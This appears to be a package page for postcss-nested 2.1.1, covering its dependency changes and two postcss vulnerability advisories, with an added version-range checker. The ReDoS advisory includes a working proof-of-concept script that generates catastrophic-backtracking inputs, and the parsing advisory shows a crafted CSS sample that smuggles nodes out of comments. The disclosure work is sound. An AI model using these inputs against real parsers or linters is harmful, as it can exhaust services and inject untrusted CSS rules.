PostCSS Nested is a valuable tool for developers seeking to enhance their CSS workflow by enabling Sass-like nested rules within their PostCSS environment. Version 2.1.1 builds upon the solid foundation of version 2.1.0, offering subtle but important improvements that contribute to a smoother development experience.
A key distinction between the two versions lies in their dependencies. Version 2.1.1 upgrades the postcss dependency from ^6.0.8 to ^6.0.9. This might contain subtle bug fixes and performance improvements within PostCSS itself, potentially leading to marginal gains in processing speed and compatibility. Additionally, version 2.1.1 includes a bump in eslint from ^4.3.0 to ^4.4.1 inside the devDependencies. While subtle, updates between minor versions often include bug fixes and better support for newer ES features, potentially leading to a more robust and reliable linting process during development.
Both versions retain the core functionality of unwrapping nested rules, mirroring Sass's intuitive syntax for organizing styles. Developers familiar with Sass will find PostCSS Nested immediately accessible, allowing them to write cleaner, more maintainable CSS. The MIT license ensures the library is free to use in commercial and personal projects. With a well-defined repository and active maintenance by Andrey Sitnik, PostCSS Nested offers a dependable solution for streamlining CSS development.
All vulnerabilities related to version 2.1.1 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*)
    var postcss = require("postcss");

    // Builds "a{}" followed by n unterminated source-map annotations and a
    // trailing "!" so that the annotation regex never finds a closing "*/".
    function build_attack(n) {
        var ret = "a{}";
        for (var i = 0; i < n; i++) {
            ret += "/*# sourceMappingURL=";
        }
        return ret + "!";
    }

    // Warm-up parse of a well-formed annotation.
    postcss.parse('a{}/*# sourceMappingURL=a.css.map */');

    // Time the parser on inputs of growing length to show super-linear growth.
    for (var i = 1; i <= 500000; i++) {
        if (i % 1000 == 0) {
            var time = Date.now();
            var attack_str = build_attack(i);
            try {
                postcss.parse(attack_str);
                var time_cost = Date.now() - time;
                console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
            } catch (e) {
                var time_cost = Date.now() - time;
                console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
            }
        }
    }
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite having originally been inside a comment.
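As an added example (not part of this page or of the postcss project), the following Node.js script checks a resolved postcss version against the affected ranges quoted in the two advisories above, so a project depending on postcss-nested 2.1.1 can tell which advisories apply to the postcss version its lockfile actually resolved. The range boundaries are read from the advisory text; the sample versions at the bottom are constructed.

```javascript
// Added example: map a resolved postcss version to the advisories on this page.
// Ranges are half-open [lo, hi): "before X" means hi = X; "between 8.0.0 and
// 8.2.13" is read as 8.0.0 <= v < 8.2.13, with 8.2.13 being the fixed release.
const ADVISORIES = [
  {
    name: "ReDoS in lib/previous-map.js",
    affected: [["0.0.0", "7.0.36"], ["8.0.0", "8.2.13"]],
  },
  {
    name: "CR line-return parsing discrepancy",
    affected: [["0.0.0", "8.4.31"]],
  },
];

// Parse "MAJOR.MINOR.PATCH" into a numeric triple. A leading "v" and any
// pre-release or build suffix are ignored; malformed input yields null.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  return m ? m.slice(1, 4).map(Number) : null;
}

// Numeric comparison of two triples (negative, zero or positive).
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// True when lo <= version < hi.
function inRange(version, lo, hi) {
  return compareVersions(version, parseVersion(lo)) >= 0 &&
         compareVersions(version, parseVersion(hi)) < 0;
}

// Names of the advisories whose affected ranges contain the given version.
function affectedAdvisories(versionString) {
  const version = parseVersion(versionString);
  if (!version) throw new Error(`unrecognised version: ${versionString}`);
  return ADVISORIES
    .filter(a => a.affected.some(([lo, hi]) => inRange(version, lo, hi)))
    .map(a => a.name);
}

// Constructed samples. postcss-nested 2.1.1 declares postcss ^6.0.9, so any
// version it resolves to falls inside both advisories' ranges.
for (const v of ["6.0.9", "7.0.36", "8.2.12", "8.4.31"]) {
  console.log(v, "->", affectedAdvisories(v));
}
```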